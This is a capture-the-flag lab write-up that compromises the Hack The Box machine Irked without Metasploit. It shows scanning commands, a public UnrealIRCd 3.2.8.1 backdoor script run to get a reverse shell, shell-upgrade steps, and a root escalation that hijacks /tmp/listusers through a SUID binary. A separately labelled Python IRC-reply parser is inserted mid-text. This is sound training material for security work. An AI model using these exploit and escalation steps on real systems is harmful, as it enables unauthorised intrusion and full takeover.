Hack The Box — Irked — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
5 min read, May 14, 2023


This is my 11th write-up for Irked, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

A typical penetration test or CTF involves 3 major phases.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we first need to gather some information about it. For that, we use Nmap to scan the ports of the target machine and find out what services are running, i.e. services that we can target. First, let’s find out which ports are open, and then we will run a detailed scan only on those ports to save time.

nmap -p- 10.129.184.170 --max-retries=1

(screenshot: nmap -p- output)

We can see what ports are open here. Let’s do a detailed nmap on these ports.

nmap -sC -sV -O -A -T4 -Pn -p22,80,111,6697,8067,60447,65534 10.129.184.170

While it’s running, let’s visit the web server to see what we have there.

(screenshot: web server)

Here we just have an image and the text “IRC is almost working!”.

I think that one of the open ports is IRC; nmap is scanning in the background anyway. We will be sure once it’s completed. For now, let’s do some directory busting.

gobuster dir -u http://10.129.184.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k --no-error

It only shows the /manual and /server-status directories. Nothing interesting here. Let’s see what nmap found out.

(screenshot: detailed nmap output)

Here we find that ports 6697, 8067 and 65534 are all running UnrealIRCd.

IRC is Internet Relay Chat, commonly used for chat rooms. To exploit this service we need to know what version of UnrealIRCd is running.

Let’s try to connect to this port with netcat.

nc 10.129.184.170 6697

So we have a connection, and I have no idea how to speak IRC language. Let’s try ‘HELP’ and see if it gives us some commands.

(screenshot: Error 451)

It gives error code 451, saying “You have not registered”, so let’s google this error code.

And Google served me the following link:

https://forums.unrealircd.org/viewtopic.php?t=5620

(screenshot: IRC register)

Here, I can see some commands that I need to execute to register first. Let’s give dummy data and see what happens.

PASS DAEMON
NICK DAEMON
USER DAEMON 0 * :DAEMONEXALA
(screenshot: IRC version)

It returned a lot of output, and in it we can see which version of Unreal is running: 3.2.8.1.
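As an added example (not from the write-up or from any of the tools it links), a small Python parser for the numeric replies an IRC server returns: it shows why HELP produced 451 before PASS/NICK/USER were sent, and pulls the version out of the 004 (RPL_MYINFO) reply so a defender can inventory which UnrealIRCd build a host is running. The sample reply lines and the server name irc.example are constructed, not captured from the box.

```python
"""Parse raw IRC server replies and extract registration state and version."""
import re

# :<prefix> <command> <params>   (prefix is optional, params may end in a ':trailing' part)
IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$')


def parse_line(line):
    """Split one raw IRC line into (prefix, command, [params]); None if malformed."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    params, rest = [], m.group("params") or ""
    while rest:
        if rest.startswith(":"):          # trailing parameter: everything after ':' is one param
            params.append(rest[1:])
            break
        head, _, rest = rest.partition(" ")
        params.append(head)
    return m.group("prefix"), m.group("cmd"), params


def server_info(lines):
    """Walk a reply stream and report whether we registered, any 451s, and the version."""
    info = {"registered": False, "version": None, "errors": []}
    for raw in lines:
        parsed = parse_line(raw)
        if parsed is None:
            continue
        _, cmd, params = parsed
        if cmd == "451":                          # ERR_NOTREGISTERED: what HELP got before registration
            info["errors"].append(params[-1] if params else "")
        elif cmd == "001":                        # RPL_WELCOME: registration accepted
            info["registered"] = True
        elif cmd == "004" and len(params) >= 3:   # RPL_MYINFO: <nick> <server> <version> <umodes> <cmodes>
            info["version"] = params[2]
    return info


# Constructed sample replies (not a real capture); irc.example is a placeholder server name.
SAMPLE_BEFORE_REGISTER = [":irc.example 451 HELP :You have not registered\r\n"]
SAMPLE_AFTER_REGISTER = [
    ":irc.example 001 DAEMON :Welcome to the IRC network DAEMON!DAEMON@10.10.14.2\r\n",
    ":irc.example 004 DAEMON irc.example Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj\r\n",
]

if __name__ == "__main__":
    print(server_info(SAMPLE_BEFORE_REGISTER))
    print(server_info(SAMPLE_AFTER_REGISTER))
```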

Okay, you know what we do when we have a version for a service, don’t you?

searchsploit Unreal 3.2.8.1

We have a Metasploit backdoor module, but we are not going to use it, since we are preparing for OSCP lol.

Exploitation

Let’s search for Unreal 3.2.8.1 Backdoor on Google. This is what I found:

https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor

First, look at the code and put in our IP and port for the reverse connection.

Let’s run it.

It tells us that it requires the target’s IP and port (of course) and a -payload parameter with 3 options (python, netcat, bash).

Let’s get a bash shell.

First start a listener.

nc -lvnp 8080

Now execute the python script.

python irc.py 10.129.184.170 6697 -payload bash

And it says “Exploit sent successfully!”

Let’s check the listener.

And we got a shell! :)

Let’s upgrade the shell first.

python -c 'import pty;pty.spawn("/bin/bash")'

Press CTRL+Z to background it.

stty raw -echo

Then

fg

And then hit Enter twice.

We are back in the shell. Now finally

export TERM=xterm

And we have a full tty shell.

Privilege Escalation

First things first, let’s check what commands we can run with sudo.

sudo -l

And sudo is not installed.

Let’s check the files with SUID.

find / -perm -u=s -type f 2>/dev/null

There’s this viewuser binary file that I am not aware of. Let’s run this and see what it does.

It says “/tmp/listusers: not found”.

Hmm… Interesting…!

Let’s create a file named listusers in /tmp, put a shell-invoking script in it, and see if it runs.

nano /tmp/listusers
===================inside the file=============
#!/bin/bash
/bin/bash

Let’s make it executable.

chmod +x /tmp/listusers

Now let’s run the viewuser binary.

And we are root!

:)
